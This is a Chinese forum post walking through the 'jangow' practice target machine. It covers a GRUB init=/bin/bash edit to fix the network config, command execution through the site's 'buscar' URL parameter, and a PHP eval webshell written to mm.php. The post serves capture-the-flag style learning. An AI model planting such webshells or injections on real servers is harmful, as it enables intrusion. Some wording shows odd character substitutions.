惊雷无声 发表于 2024-12-27 07:14:47

jangow靶机

打开靶机,打开kali,有的人会发现扫不到靶机的ip

https://i-blog.csdnimg.cn/img_convert/e18cdc6d63e4f426f4618788d727bcfa.png
在网上搜索了半天,发现是靶机的网卡配置有问题
重启靶机,选第二个

https://i-blog.csdnimg.cn/img_convert/4570fb6df120ca561482a643702d3602.png
进去后再选第二个,按e

https://i-blog.csdnimg.cn/img_convert/4522bcd440f60005e62b4e5afca1a34c.png
找到ro这一行

https://i-blog.csdnimg.cn/img_convert/2525e41993ebbbea4d614eea9fc9c0b0.png
把ro后面这一行的内容都替换成ro = rw signin init=/bin/bash

https://i-blog.csdnimg.cn/img_convert/7f15c9efe9da2622e92b24873a508ddb.png
ctrl+x
输入ifconfig -a查看一下本身的网卡名称,我是ens33

https://i-blog.csdnimg.cn/img_convert/3447f1baec390993c4c67d01e1a7c1d2.png
在输入
cd etc
cd network
vim interfaces

https://i-blog.csdnimg.cn/img_convert/d90ea7e89902bc355ed40774f793a0e6.png
改下这个网卡名称就好了

https://i-blog.csdnimg.cn/img_convert/de18070bba3e124706c4cc238a09c201.png
按shift+/
输入wq保存
重启靶机
再打开kali扫描一下就出来靶机的ip了

https://i-blog.csdnimg.cn/img_convert/9f2e3913d2e78116af091edbd17ef9d9.png
去访问

https://i-blog.csdnimg.cn/img_convert/1ee9444db444815f824917e26a914474.png
我们进入网站以后,起首扫描一下端口,发现没有有用的信息,在扫一下后台,目前也没有什么有用的信息
我们在点击页面上的size

https://i-blog.csdnimg.cn/img_convert/b4d6dfa022595c0f56918c6a70a16fc3.png
我们翻了翻,发现了点进buscar中页面空缺,但是网址上有一个buscar的参数

https://i-blog.csdnimg.cn/img_convert/c98129df2faf0f06a24a04a81bd1c4b0.png
我们颠末实验之后,竟然可以执行系统下令

https://i-blog.csdnimg.cn/img_convert/b0db5f9f1c1baf38186984fd72127f28.png
那么我们实验写个木马进去
一开始我写的是echo '<?php @eval($_POST['cmd']); ?>' > mm.php
但是颠末测试,会乱码,多次实验之后把POST中的cmd缩短,而且把单引号去掉就好了
输入echo '<?php @eval($_POST); ?>' > mm.php

https://i-blog.csdnimg.cn/img_convert/609e3368339b6bcc2f5466c2837c064b.png
在去访问mm.php

https://i-blog.csdnimg.cn/img_convert/dc95663fd7940529388f43ddd7a14156.png
查抄一下是否写入成功

https://i-blog.csdnimg.cn/img_convert/cd3a594adfb3e17d3fdc3c6f843f0eab.png
写入成功!!!


免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: jangow靶机